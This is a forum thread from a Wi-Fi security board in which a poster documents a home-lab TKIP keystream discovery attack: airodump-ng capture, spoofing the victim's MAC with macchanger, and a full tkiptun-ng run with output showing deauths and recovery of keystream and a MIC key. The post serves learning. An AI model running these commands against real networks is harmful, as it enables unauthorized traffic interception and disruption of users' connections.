Forum

WPA/WPA2 TKIP RC4 keystream discovery attack (For learning purpose)

2 posts by 2 authors in: Forums > CWSP - Enterprise Wi-Fi Security
Last Post: April 19, 2010:
  • By Vertigo
    Reply

    Victim:
    Model: HP 6310b
    CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
    Memory: 4GB
    OS: Windows 7
    Wireless Interface: Intel(R) WiFi Link 5100 AGN
    WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
    MAC address: 00:1E:65:F8:BA:A8

    Attacker:
    Model: Dell Optiplex GX270
    CPU: Intel Pentium 4 2.60 GHz
    Memory: 1GB
    OS: BT4F
    Wireless Cards: Alfa AWUS360H with 7dB omnidirectional antenna(for attackings), Linksys WPC54AG PCMCIA (in promiscous mode)

    AP:
    Model: Linksys WRT54GL v1.1
    Firmware: v4.30.11, Aug. 17, 2007
    Wireless security and settings: WPA/WPA2-Enterprise, TKIP/AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
    BSSID: 00:18:D3:93:FB:A0

    Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange

    Run airodump-ng for WPA:
    root@bt:~# airodump-ng -c 2 -w dump wlan2

    CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:D3:93:FB:A0

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:18:D3:93:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
    00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR

    BSSID STATION PWR Rate Lost Packets Probes

    00:18:393:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
    00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
    ^C
    root@bt:~#

    Run airodump-ng for WPA2:
    root@bt:~# airodump-ng -c 2 -w dump wlan2

    CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:393:FB:A0

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:18:393:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
    00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
    00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>

    BSSID STATION PWR Rate Lost Packets Probes

    (not associated) 00:24:8C:57:8F3 -68 0 - 2 0 8
    00:18:393:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
    00:1F:33:FF:39:52 00:18:393:FB:A0 -36 1e- 1 0 8
    00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
    ^C

    Change attacker's MAC address:
    root@bt:~# ifconfig wlan0 down
    root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
    Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
    Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
    root@bt:~# ifconfig wlan0 up

    Run TKIP keystream discovery attack:
    root@bt:~# tkiptun-ng -a 00:18:393:FB:A0 -h 00:1E:65:F8:BA:A8 -m 80 -n 100 wlan0
    Blub 2:38 E6 38 1C 24 15 1C CF
    Blub 1:17 DD 0D 69 1D C3 1F EE
    Blub 3:29 31 79 E7 E6 CF 8D 5E
    08:24:01 Michael Test: Successful
    08:24:01 Waiting for beacon frame (BSSID: 00:18:393:FB:A0) on channel 2
    08:24:01 Found specified AP
    08:24:01 WPA handshake: 00:18:393:FB:A0 captured65:F8:BA:A8] [ 6| 3 ACKs]
    08:24:01 Sending 4 directed DeAuth. STMAC: [00:1E:65:F8:BA:A8] [ 9| 6 ACKs]
    08:24:02 Waiting for an ARP packet coming from the Client...
    Saving chosen packet in replay_src-0329-082409.cap
    08:24:09 Waiting for an ARP response packet coming from the AP...
    Saving chosen packet in replay_src-0329-082409.cap
    08:24:09 Got the answer!
    08:24:09 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.

    08:24:31 Offset 81 ( 0% done) | xor = 49 | pt = 40 | 122 frames written in 100055ms
    08:25:47 Offset 80 ( 2% done) | xor = 8B | pt = 2A | 155 frames written in 127108ms
    08:27:03 Offset 79 ( 4% done) | xor = 39 | pt = 01 | 163 frames written in 133657ms
    08:28:18 Offset 78 ( 7% done) | xor = 03 | pt = F4 | 144 frames written in 118079ms
    08:29:34 Offset 77 ( 9% done) | xor = EF | pt = 6F | 157 frames written in 128742ms
    08:30:42 Offset 76 (11% done) | xor = 76 | pt = 95 | 75 frames written in 61500ms
    08:32:01 Offset 75 (14% done) | xor = BA | pt = 67 | 187 frames written in 153338ms
    08:33:06 Offset 74 (16% done) | xor = 03 | pt = 14 | 54 frames written in 44279ms
    08:34:25 Offset 73 (19% done) | xor = 02 | pt = A4 | 190 frames written in 155801ms
    08:35:32 Offset 72 (21% done) | xor = F0 | pt = 3F | 67 frames written in 54943ms
    08:36:52 Offset 71 (23% done) | xor = D5 | pt = 93 | 193 frames written in 158255ms
    08:38:15 Offset 70 (26% done) | xor = 7D | pt = 1D | 230 frames written in 188622ms
    Sleeping for 60 seconds.36 bytes still unknown
    ARP Reply
    Checking 192.168.x.y
    08:38:15 Reversed MIC Key (FromDS): D6:16:91:B7:23:03:E4:25

    Saving plaintext in replay_dec-0329-083815.cap
    Saving keystream in replay_dec-0329-083815.xor
    08:38:15
    Completed in 836s (0.05 bytes/s)

    08:38:15 AP MAC: 00:18:393:FB:9E IP: 192.168.0.1
    08:38:15 Client MAC: 00:1E:65:F8:BA:A8 IP: 192.168.0.103
    08:38:15 Sent encrypted tkip ARP request to the client.
    08:38:15 Wait for the mic countermeasure timeout of 60 seconds.

    Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
    Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
    Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
    Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
    Sent 1172 packets, current guess: 8F...

    Failure: got several deauthentication packets from the AP - you need to start the whole process all over again, as the client got disconnected.

    root@bt:~#
     

    Good Luck!
    =================
    Vertigo
    GCIH, Security+

  • By z4
    Reply

    why win7 ignores Vertigo? any disadvantage before version

Page 1 of 1
  • 1